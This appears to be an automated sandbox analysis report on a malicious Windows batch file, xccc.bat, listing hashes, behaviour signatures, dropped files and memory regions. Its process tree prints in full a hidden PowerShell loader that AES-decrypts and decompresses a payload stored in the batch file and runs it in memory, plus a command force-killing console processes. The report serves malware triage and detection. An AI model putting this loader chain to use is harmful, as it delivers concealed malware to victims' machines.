Analysis

  • max time kernel
    60s
  • max time network
    38s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/04/2024, 13:30

General

  • Target

    xccc.bat

  • Size

    1.6MB

  • MD5

    a1e6c524a6982d7148de18b82ccf4b4c

  • SHA1

    bfb6449c135de59fb53d65a11b7a1512e4d6ce97

  • SHA256

    c00cc28d3c1b0187d1971c7e399acd5d9acae5c8042cd8d08c5b492697e0d83d

  • SHA512

    a14cb2f7465cd82dab90d9445da7a362b11ff67100db57da886cfd84cce2ba926a889cb4360203ca94cd73728f93abe367421415bb788e090281e3822413a7d8

  • SSDEEP

    24576:BFjjUxX2aos0an5wdEc5R3eGmasM6MK4NWytx5qwmbw61OFW:BGxXjoY5wiqRuGmtw61X

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xccc.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Windows\system32\cmd.exe
      cmd.exe /c powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -Command "Get-Process OpenConsole | Stop-Process -Force"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2324

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    e89c193840c8fb53fc3de104b1c4b092

    SHA1

    8b41b6a392780e48cc33e673cf4412080c42981e

    SHA256

    920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

    SHA512

    865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iwauytea.o4m.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1592-16-0x00007FFA356C0000-0x00007FFA36181000-memory.dmp

    Filesize

    10.8MB

  • memory/1592-12-0x00000284FA900000-0x00000284FA910000-memory.dmp

    Filesize

    64KB

  • memory/1592-13-0x00000284FD270000-0x00000284FD3A6000-memory.dmp

    Filesize

    1.2MB

  • memory/1592-0-0x00000284FD020000-0x00000284FD042000-memory.dmp

    Filesize

    136KB

  • memory/1592-11-0x00000284FA900000-0x00000284FA910000-memory.dmp

    Filesize

    64KB

  • memory/1592-10-0x00007FFA356C0000-0x00007FFA36181000-memory.dmp

    Filesize

    10.8MB

  • memory/2324-18-0x00007FFA354D0000-0x00007FFA35F91000-memory.dmp

    Filesize

    10.8MB

  • memory/2324-19-0x000001D77BB70000-0x000001D77BB80000-memory.dmp

    Filesize

    64KB

  • memory/2324-20-0x000001D77BB70000-0x000001D77BB80000-memory.dmp

    Filesize

    64KB

  • memory/2324-32-0x00007FFA354D0000-0x00007FFA35F91000-memory.dmp

    Filesize

    10.8MB